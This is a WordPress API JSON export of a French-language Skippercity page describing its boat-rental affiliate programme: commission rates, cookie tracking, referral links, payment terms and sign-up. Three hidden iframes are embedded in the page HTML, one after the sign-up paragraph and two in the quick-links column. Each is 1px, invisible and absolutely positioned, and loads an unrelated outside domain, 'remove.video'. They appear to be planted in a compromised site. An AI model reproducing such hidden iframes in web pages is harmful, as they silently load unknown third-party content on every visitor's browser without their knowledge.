{"id":412107,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/programme-daffiliation-pour-la-location-de-bateaux\/"},"modified":"2024-02-21T11:19:50","modified_gmt":"2024-02-21T11:19:50","slug":"programme-daffiliation-pour-la-location-de-bateaux","status":"publish","type":"page","link":"https:\/\/skippercity.com\/fr\/programme-daffiliation-pour-la-location-de-bateaux\/","title":{"rendered":"Programme d&rsquo;affiliation pour la location de bateaux"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412107\" class=\"elementor elementor-412107 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Programme d'affiliation pour la location de bateaux<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>En bref :<\/strong><\/span><\/p>\n<ul>\n<li>Programme d&rsquo;affiliation le plus r\u00e9mun\u00e9rateur<\/li>\n<li>20-25% de notre commission sur la location de bateaux<\/li>\n<li>Commissions \u00e0 vie<\/li>\n<li>365 jours d&rsquo;expiration des cookies<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;Aucun titre n\\u2019a \\u00e9t\\u00e9 trouv\\u00e9 sur cette page.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tTable des mati\u00e8res\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Programme d&rsquo;affiliation pour la location de bateaux<\/h2>\n<p>Si vous avez un site web avec des clients susceptibles d&rsquo;\u00eatre int\u00e9ress\u00e9s par l&rsquo;affr\u00e8tement de yachts &#8211; voiliers, gulets, yachts \u00e0 moteur, superyachts &#8211; un peu partout dans le monde, nous serions int\u00e9ress\u00e9s \u00e0 travailler avec vous sur un partenariat d&rsquo;affiliation.<\/p>\n<p><u><b>Nous aimons les partenaires !<\/b><\/u><\/p>\n<p>Le programme d&rsquo;affiliation de Yachtco vous permet de commencer \u00e0 gagner de l&rsquo;argent gr\u00e2ce \u00e0 la location de bateaux en ajoutant simplement un lien de votre site vers le n\u00f4tre.<\/p>\n<h2>Comment cela fonctionne-t-il ?<\/h2>\n<p>Lorsqu&rsquo;un client <strong>clique sur votre lien sur votre site web<\/strong> (ou blog ou m\u00e9dias sociaux), aboutit sur notre site et affr\u00e8te un bateau par notre interm\u00e9diaire, un pourcentage de la commission vous est cr\u00e9dit\u00e9 conform\u00e9ment \u00e0 nos conditions g\u00e9n\u00e9rales. Tout est contr\u00f4l\u00e9 (\u00e9lectroniquement et hors ligne) et nous surveillons l&rsquo;\u00e9tat des pistes pour vous.<\/p>\n<p><strong>Un courtier (c&rsquo;est-\u00e0-dire nous) per\u00e7oit une commission<\/strong> sur la valeur nette de l&rsquo;affr\u00e8tement d&rsquo;un bateau r\u00e9serv\u00e9 (sans tenir compte de l&rsquo;APA ou de tout autre article ou service suppl\u00e9mentaire command\u00e9). Cette commission d\u00e9pend du lieu, du type de bateau et des commissions du secteur. <strong>L&rsquo;affili\u00e9 (c&rsquo;est-\u00e0-dire vous) gagnera 20%-25%<\/strong> comme taux de base pour cette commission gagn\u00e9e aupr\u00e8s du courtier.<\/p>\n<p><b>Skippercity est fier de suivre fid\u00e8lement tous ses clients, et c&rsquo;est pourquoi les affili\u00e9s sont r\u00e9mun\u00e9r\u00e9s en gagnant 20%-25% de notre commission sur toutes les r\u00e9servations des clients qui reviennent vers nous.<\/b><\/p>\n<p>Notre syst\u00e8me suit les clients qui se sont renseign\u00e9s aupr\u00e8s d&rsquo;un affili\u00e9 ou qui ont effectu\u00e9 une r\u00e9servation aupr\u00e8s d&rsquo;un affili\u00e9, de sorte que nous pouvons toujours reverser les commissions \u00e0 l&rsquo;affili\u00e9. Skippercity respectera l&rsquo;introduction et offrira aux affili\u00e9s une commission d&rsquo;introduction si le client revient \u00e0 Skippercity en dehors du programme d&rsquo;affiliation (c&rsquo;est-\u00e0-dire sans cookies) pour honorer le lien qu&rsquo;il nous a donn\u00e9, car il est arriv\u00e9 chez nous apr\u00e8s s&rsquo;\u00eatre renseign\u00e9 par l&rsquo;interm\u00e9diaire d&rsquo;un affili\u00e9.<\/p>\n<p>3 000 EUR est la valeur nette moyenne de l&rsquo;affr\u00e8tement pour commencer \u00e0 percevoir votre commission. Nos conditions g\u00e9n\u00e9rales s&rsquo;appliquent.<\/p>\n<p>Nous vous proposons des modes d&rsquo;interrogation, des images \u00e9l\u00e9gantes et des boutons. Ils sont tous disponibles depuis votre \u00ab\u00a0tableau de bord\u00a0\u00bb d&rsquo;affili\u00e9, il vous suffit donc de copier et de coller le code sur votre site web, et vous \u00eates tous pr\u00eats \u00e0 partir !<\/p>\n<p>Votre URL pour les affili\u00e9s sera https:\/\/skippercity.com\/?ref=username. Il vous suffit d&rsquo;installer le code (?ref=?ref=nom d&rsquo;utilisateur) \u00e0 la fin de tout lien vers Skippercity, et tout est contr\u00f4l\u00e9 \u00e0 partir de l\u00e0 !<\/p>\n<p><a href=\"https:\/\/skippercity.com\/fr\/devenez-notre-affilie\/\">Si vous souhaitez vous inscrire \u00e0 notre programme d&rsquo;affiliation, il vous suffit de cliquer ici pour<\/a> vous inscrire et nous traiterons votre demande d&rsquo;adh\u00e9sion au programme.<\/p>\n<p>Tout le contenu du site Web de SkipperCity est prot\u00e9g\u00e9 par des droits d&rsquo;auteur. Nous n&rsquo;encourageons pas nos affili\u00e9s \u00e0 utiliser le contenu de https:\/\/skippercity.com et \u00e0 copier ou dupliquer le mat\u00e9riel sur leur propre site web d&rsquo;une mani\u00e8re ou d&rsquo;une autre. Mais vous pouvez proposer votre propre contenu et faire un lien avec nous.<\/p>\n<h2>Comment nous suivons les ventes<\/h2>\n<p>Tous les clients venant de votre site seront \u00ab\u00a0cuisin\u00e9s\u00a0\u00bb et votre compte sera li\u00e9 aux cookies. Lorsqu&rsquo;un client nous envoie une demande ou cr\u00e9e un compte chez nous, nous faisons ce que nous faisons le mieux &#8211; recommander le bon bateau, organiser le contrat et les paiements, et faire en sorte que le client monte \u00e0 bord.<\/p>\n<p>Si le client qui affr\u00e8te un yacht provient de votre site web, nous partagerons avec vous une partie de la commission.<\/p>\n<h2>Comment \u00eates-vous pay\u00e9 ?<\/h2>\n<p>Nous payons nos affili\u00e9s par virement bancaire ou via Stripe.<\/p>\n<p>Les affili\u00e9s seront pay\u00e9s un mois apr\u00e8s l&rsquo;ach\u00e8vement satisfaisant de la charte &#8211; c&rsquo;est la norme dans le secteur pour toutes les parties int\u00e9ress\u00e9es. Tous les participants sont pay\u00e9s \u00e0 l&rsquo;issue de l&rsquo;affr\u00e8tement, car s&rsquo;il y a des probl\u00e8mes pendant l&rsquo;affr\u00e8tement, nous voulons nous assurer que les courtiers, les gestionnaires de yacht, les skippers et les propri\u00e9taires les r\u00e9solvent avant que les clients ne d\u00e9barquent du yacht.<\/p>\n<p>Pour tous les charters annul\u00e9s (par les clients ou les propri\u00e9taires), les affili\u00e9s, les agents de voyage et toutes les personnes recommand\u00e9es ne per\u00e7oivent aucune commission.<\/p>\n<h2>Comment s&rsquo;inscrire au programme d&rsquo;affiliation<\/h2>\n<p>Vous devez avoir un site web, un blog ou un r\u00e9seau social existant avec une client\u00e8le compl\u00e9mentaire \u00e0 la location de bateaux (voyages, produits de luxe, services de conciergerie, etc.) pour postuler au programme d&rsquo;affiliation.<\/p>\n<p>Vous ne courez aucun risque et n&rsquo;engagez aucune d\u00e9pense pour le programme d&rsquo;affiliation. Il vous suffit de <a href=\"https:\/\/skippercity.com\/fr\/devenez-notre-affilie\/\">remplir notre formulaire en ligne<\/a>.<iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/fr\/devenez-notre-affilie\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">S'inscrire \u00e0 notre programme d'affiliation pour la location de bateaux<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Liens rapides :<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/fr\/devenez-notre-affilie\/\">S&rsquo;inscrire<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/fr\/connexion-des-affilies\/\">Connexion<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/fr\/mon-compte-2\/\">Votre compte d&rsquo;affili\u00e9<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Programme d&rsquo;affiliation pour la location de bateaux En bref : Programme d&rsquo;affiliation le plus r\u00e9mun\u00e9rateur 20-25% de notre commission sur la location de bateaux Commissions \u00e0 vie 365 jours d&rsquo;expiration des cookies Table des mati\u00e8res Programme d&rsquo;affiliation pour la location de bateaux Si vous avez un site web avec des clients susceptibles d&rsquo;\u00eatre int\u00e9ress\u00e9s par [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412107","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/fr\/wp-json\/wp\/v2\/pages\/412107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/fr\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/fr\/wp-json\/wp\/v2\/comments?post=412107"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/fr\/wp-json\/wp\/v2\/pages\/412107\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/fr\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/fr\/wp-json\/wp\/v2\/media?parent=412107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}